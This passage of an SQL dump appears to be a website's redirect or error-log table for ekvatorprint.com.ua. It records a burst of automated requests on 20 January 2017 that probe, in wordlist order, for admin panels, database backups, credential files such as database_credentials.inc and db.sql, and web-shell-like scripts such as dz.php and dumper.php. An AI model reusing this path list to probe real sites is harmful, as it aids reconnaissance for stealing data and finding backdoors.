00:00:00',301),(6364,'http://ekvatorprint.com.ua/cs-admin',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6365,'http://ekvatorprint.com.ua/cs_admin',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6366,'http://ekvatorprint.com.ua/cron/cron.sh',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6367,'http://ekvatorprint.com.ua/cronlog.txt',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6368,'http://ekvatorprint.com.ua/cs',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6369,'http://ekvatorprint.com.ua/crossdomain.xml',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6370,'http://ekvatorprint.com.ua/css',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6371,'http://ekvatorprint.com.ua/culeadora.txt',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6372,'http://ekvatorprint.com.ua/csadmin',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6373,'http://ekvatorprint.com.ua/current',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6374,'http://ekvatorprint.com.ua/customer',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6375,'http://ekvatorprint.com.ua/custom/db.ini',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6376,'http://ekvatorprint.com.ua/cubecart',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6377,'http://ekvatorprint.com.ua/csv',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6378,'http://ekvatorprint.com.ua/customers',NULL,'','',1,0,'2017-01-20 13:28:09','0000-00-00 00:00:00',301),(6379,'http://ekvatorprint.com.ua/customers.sql',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6380,'http://ekvatorprint.com.ua/customers.log',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6381,'http://ekvatorprint.com.ua/customers.mdb',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6382,'http://ekvatorprint.com.ua/customers.sql.gz',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6383,'http://ekvatorprint.com.ua/customers.csv',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6384,'http://ekvatorprint.com.ua/cvs',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6385,'http://ekvatorprint.com.ua/customers.sqlite',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6386,'http://ekvatorprint.com.ua/customers.xls',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6387,'http://ekvatorprint.com.ua/customers.txt',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6388,'http://ekvatorprint.com.ua/cvs/',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6389,'http://ekvatorprint.com.ua/cvsadmin',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6390,'http://ekvatorprint.com.ua/d0maine.php',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6391,'http://ekvatorprint.com.ua/d',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6392,'http://ekvatorprint.com.ua/d.php',NULL,'','',2,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6393,'http://ekvatorprint.com.ua/d0main.php',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6394,'http://ekvatorprint.com.ua/dad',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6395,'http://ekvatorprint.com.ua/cwadmin',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6396,'http://ekvatorprint.com.ua/d0mains.php',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6397,'http://ekvatorprint.com.ua/dam.php',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6398,'http://ekvatorprint.com.ua/dadmin',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6399,'http://ekvatorprint.com.ua/data-nseries.tsv',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6400,'http://ekvatorprint.com.ua/dashboard.php',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6401,'http://ekvatorprint.com.ua/data',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6402,'http://ekvatorprint.com.ua/dashboard.',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6403,'http://ekvatorprint.com.ua/dat',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6404,'http://ekvatorprint.com.ua/data.sqlite',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6405,'http://ekvatorprint.com.ua/data.mdb',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6406,'http://ekvatorprint.com.ua/data.txt',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6407,'http://ekvatorprint.com.ua/data.tsv',NULL,'','',1,0,'2017-01-20 13:28:10','0000-00-00 00:00:00',301),(6408,'http://ekvatorprint.com.ua/data/debug/',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6409,'http://ekvatorprint.com.ua/data/backups/',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6410,'http://ekvatorprint.com.ua/data/files/',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6411,'http://ekvatorprint.com.ua/data/tmp/',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6412,'http://ekvatorprint.com.ua/database.inc',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6413,'http://ekvatorprint.com.ua/data/logs/',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6414,'http://ekvatorprint.com.ua/database.csv',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6415,'http://ekvatorprint.com.ua/database.log',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6416,'http://ekvatorprint.com.ua/database',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6417,'http://ekvatorprint.com.ua/database.mdb',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6418,'http://ekvatorprint.com.ua/database.yml.sqlite3',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6419,'http://ekvatorprint.com.ua/database.sqlite',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6420,'http://ekvatorprint.com.ua/database.yml~',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6421,'http://ekvatorprint.com.ua/database.yml',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6422,'http://ekvatorprint.com.ua/database.yml.pgsql',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6423,'http://ekvatorprint.com.ua/database.txt',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6424,'http://ekvatorprint.com.ua/database.yml_original',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6425,'http://ekvatorprint.com.ua/database_admin',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6426,'http://ekvatorprint.com.ua/database_credentials.inc',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6427,'http://ekvatorprint.com.ua/db-admin',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6428,'http://ekvatorprint.com.ua/databases.yml',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6429,'http://ekvatorprint.com.ua/db',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6430,'http://ekvatorprint.com.ua/dataobject.ini',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6431,'http://ekvatorprint.com.ua/davmail.log',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6432,'http://ekvatorprint.com.ua/db-full.mysql',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6433,'http://ekvatorprint.com.ua/db.csv',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6434,'http://ekvatorprint.com.ua/db.ini',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6435,'http://ekvatorprint.com.ua/db.inc',NULL,'','',1,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6436,'http://ekvatorprint.com.ua/db.sql',NULL,'','',6,0,'2017-01-20 13:28:11','0000-00-00 00:00:00',301),(6437,'http://ekvatorprint.com.ua/db.log',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6438,'http://ekvatorprint.com.ua/db1.sqlite',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6439,'http://ekvatorprint.com.ua/db.mdb',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6440,'http://ekvatorprint.com.ua/db.sqlite',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6441,'http://ekvatorprint.com.ua/db1.mdb',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6442,'http://ekvatorprint.com.ua/db2',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6443,'http://ekvatorprint.com.ua/db/main.mdb',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6444,'http://ekvatorprint.com.ua/db_admin',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6445,'http://ekvatorprint.com.ua/db_backups/',NULL,'','',2,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6446,'http://ekvatorprint.com.ua/dbadmin.php',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6447,'http://ekvatorprint.com.ua/dbaccess.log',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6448,'http://ekvatorprint.com.ua/dbadmin',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6449,'http://ekvatorprint.com.ua/dbbackup/',NULL,'','',3,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6450,'http://ekvatorprint.com.ua/dbadmin/',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6451,'http://ekvatorprint.com.ua/dbase',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6452,'http://ekvatorprint.com.ua/dbfix/',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6453,'http://ekvatorprint.com.ua/dcadmin.cgi',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6454,'http://ekvatorprint.com.ua/de',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6455,'http://ekvatorprint.com.ua/dead.letter',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6456,'http://ekvatorprint.com.ua/dealer_admin',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6457,'http://ekvatorprint.com.ua/dealeradmin',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6458,'http://ekvatorprint.com.ua/debug',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6459,'http://ekvatorprint.com.ua/debug-output.txt',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6460,'http://ekvatorprint.com.ua/debug.inc',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6461,'http://ekvatorprint.com.ua/debug/',NULL,'','',1,0,'2017-01-20 13:28:12','0000-00-00 00:00:00',301),(6462,'http://ekvatorprint.com.ua/debug.xml',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6463,'http://ekvatorprint.com.ua/debug.log',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6464,'http://ekvatorprint.com.ua/default2.php',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6465,'http://ekvatorprint.com.ua/debug.py',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6466,'http://ekvatorprint.com.ua/debug.php',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6467,'http://ekvatorprint.com.ua/debug.txt',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6468,'http://ekvatorprint.com.ua/default',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6469,'http://ekvatorprint.com.ua/debug_error.jsp',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6470,'http://ekvatorprint.com.ua/demo',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6471,'http://ekvatorprint.com.ua/default2.',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6472,'http://ekvatorprint.com.ua/demo.php',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6473,'http://ekvatorprint.com.ua/delete.php',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6474,'http://ekvatorprint.com.ua/demo/ejb/index.html',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6475,'http://ekvatorprint.com.ua/demo/sql/index.jsp',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6476,'http://ekvatorprint.com.ua/desktop/index_framed.htm',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6477,'http://ekvatorprint.com.ua/demoadmin',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6478,'http://ekvatorprint.com.ua/deploy.rb',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6479,'http://ekvatorprint.com.ua/deploy',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6480,'http://ekvatorprint.com.ua/developer',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6481,'http://ekvatorprint.com.ua/dev',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6482,'http://ekvatorprint.com.ua/developers',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6483,'http://ekvatorprint.com.ua/dev.php',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6484,'http://ekvatorprint.com.ua/devel',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6485,'http://ekvatorprint.com.ua/design',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6486,'http://ekvatorprint.com.ua/detail',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6487,'http://ekvatorprint.com.ua/dev/',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6488,'http://ekvatorprint.com.ua/details',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6489,'http://ekvatorprint.com.ua/development.esproj/',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6490,'http://ekvatorprint.com.ua/development-parts/',NULL,'','',1,0,'2017-01-20 13:28:13','0000-00-00 00:00:00',301),(6491,'http://ekvatorprint.com.ua/devels',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6492,'http://ekvatorprint.com.ua/dir',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6493,'http://ekvatorprint.com.ua/dhadmin',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6494,'http://ekvatorprint.com.ua/dialog/oauth/',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6495,'http://ekvatorprint.com.ua/dfshealth.jsp',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6496,'http://ekvatorprint.com.ua/df_main.sql',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6497,'http://ekvatorprint.com.ua/development/',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6498,'http://ekvatorprint.com.ua/directadmin',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6499,'http://ekvatorprint.com.ua/dgadmin',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6500,'http://ekvatorprint.com.ua/directory.php',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6501,'http://ekvatorprint.com.ua/diradmin',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6502,'http://ekvatorprint.com.ua/display',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6503,'http://ekvatorprint.com.ua/directory.',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6504,'http://ekvatorprint.com.ua/directory',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6505,'http://ekvatorprint.com.ua/discus_admin_40',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6506,'http://ekvatorprint.com.ua/disclaimer',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6507,'http://ekvatorprint.com.ua/discus_admin',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6508,'http://ekvatorprint.com.ua/django_lfc.egg-info/vPKG-INFO',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6509,'http://ekvatorprint.com.ua/dl',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6510,'http://ekvatorprint.com.ua/dist/',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6511,'http://ekvatorprint.com.ua/dlgadmin',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6512,'http://ekvatorprint.com.ua/doc',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6513,'http://ekvatorprint.com.ua/doc/',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6514,'http://ekvatorprint.com.ua/doadmin',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6515,'http://ekvatorprint.com.ua/doc/stable.version',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6516,'http://ekvatorprint.com.ua/doc/en/changes.html',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6517,'http://ekvatorprint.com.ua/docs/html/admin/ch01.html',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6518,'http://ekvatorprint.com.ua/docs/CHANGELOG.html',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6519,'http://ekvatorprint.com.ua/docs/export-demo.xml',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6520,'http://ekvatorprint.com.ua/docs/changelog.txt',NULL,'','',1,0,'2017-01-20 13:28:14','0000-00-00 00:00:00',301),(6521,'http://ekvatorprint.com.ua/docs/html/admin/ch01s04.html',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6522,'http://ekvatorprint.com.ua/docs/html/admin/ch03s07.html',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6523,'http://ekvatorprint.com.ua/docs/html/admin/index.html',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6524,'http://ekvatorprint.com.ua/docs/updating.txt',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6525,'http://ekvatorprint.com.ua/docs/maintenance.txt',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6526,'http://ekvatorprint.com.ua/docs51',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6527,'http://ekvatorprint.com.ua/docs/html/developer/ch03s15.html',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6528,'http://ekvatorprint.com.ua/docs/html/developer/ch02.html',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6529,'http://ekvatorprint.com.ua/doctrine/schema/tmx.yml',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6530,'http://ekvatorprint.com.ua/doctrine/schema/eirec.yml',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6531,'http://ekvatorprint.com.ua/documentation',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6532,'http://ekvatorprint.com.ua/documents',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6533,'http://ekvatorprint.com.ua/documentation/config.yml',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6534,'http://ekvatorprint.com.ua/dom.php',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6535,'http://ekvatorprint.com.ua/domain',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6536,'http://ekvatorprint.com.ua/dot',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6537,'http://ekvatorprint.com.ua/domcfg.nsf/?open',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6538,'http://ekvatorprint.com.ua/domostroy.admin',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6539,'http://ekvatorprint.com.ua/domcfg.nsf',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6540,'http://ekvatorprint.com.ua/download',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6541,'http://ekvatorprint.com.ua/download/history.csv',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6542,'http://ekvatorprint.com.ua/down',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6543,'http://ekvatorprint.com.ua/dp',NULL,'','',1,0,'2017-01-20 13:28:15','0000-00-00 00:00:00',301),(6544,'http://ekvatorprint.com.ua/donate',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6545,'http://ekvatorprint.com.ua/download/users.csv',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6546,'http://ekvatorprint.com.ua/dra.php',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6547,'http://ekvatorprint.com.ua/downloader',NULL,'','',5,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6548,'http://ekvatorprint.com.ua/drp-publish',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6549,'http://ekvatorprint.com.ua/downloads/dom.php',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6550,'http://ekvatorprint.com.ua/downloader/connect.cfg',NULL,'','',2,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6551,'http://ekvatorprint.com.ua/downloader/cache.cfg',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6552,'http://ekvatorprint.com.ua/dpadmin.',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6553,'http://ekvatorprint.com.ua/drp-exports',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6554,'http://ekvatorprint.com.ua/dpadmin.php',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6555,'http://ekvatorprint.com.ua/dummy.php',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6556,'http://ekvatorprint.com.ua/drupal',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6557,'http://ekvatorprint.com.ua/dummy',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6558,'http://ekvatorprint.com.ua/dsadmin',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6559,'http://ekvatorprint.com.ua/downloads',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6560,'http://ekvatorprint.com.ua/dump.log',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6561,'http://ekvatorprint.com.ua/dump',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6562,'http://ekvatorprint.com.ua/dump.7z',NULL,'','',2,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6563,'http://ekvatorprint.com.ua/dump.sql.old',NULL,'','',1,0,'2017-01-20 13:28:16','0000-00-00 00:00:00',301),(6564,'http://ekvatorprint.com.ua/dump.inc.old',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6565,'http://ekvatorprint.com.ua/dump.tar.bz2',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6566,'http://ekvatorprint.com.ua/dump.inc',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6567,'http://ekvatorprint.com.ua/dump.sqlite',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6568,'http://ekvatorprint.com.ua/dump.rdb',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6569,'http://ekvatorprint.com.ua/dump.old',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6570,'http://ekvatorprint.com.ua/dyn',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6571,'http://ekvatorprint.com.ua/dvwa/',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6572,'http://ekvatorprint.com.ua/dumper/',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6573,'http://ekvatorprint.com.ua/dumper.php',NULL,'','',2,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6574,'http://ekvatorprint.com.ua/dvdadmin',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6575,'http://ekvatorprint.com.ua/e-admin',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6576,'http://ekvatorprint.com.ua/e',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6577,'http://ekvatorprint.com.ua/dz.php',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6578,'http://ekvatorprint.com.ua/dz0.php',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6579,'http://ekvatorprint.com.ua/dz1.php',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6580,'http://ekvatorprint.com.ua/ecadmin',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6581,'http://ekvatorprint.com.ua/ecartadmin',NULL,'','',1,0,'2017-01-20 13:28:17','0000-00-00 00:00:00',301),(6582,'http://ekvatorprint.com.ua/e-mail',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6583,'http://ekvatorprint.com.ua/eadmin',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6584,'http://ekvatorprint.com.ua/e107_admin',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6585,'http://ekvatorprint.com.ua/echo',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6586,'http://ekvatorprint.com.ua/edit.php',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6587,'http://ekvatorprint.com.ua/e2ePortalProject/Login.portal',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6588,'http://ekvatorprint.com.ua/ebayadmin',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 00:00:00',301),(6589,'http://ekvatorprint.com.ua/editor/stats/',NULL,'','',1,0,'2017-01-20 13:28:18','0000-00-00 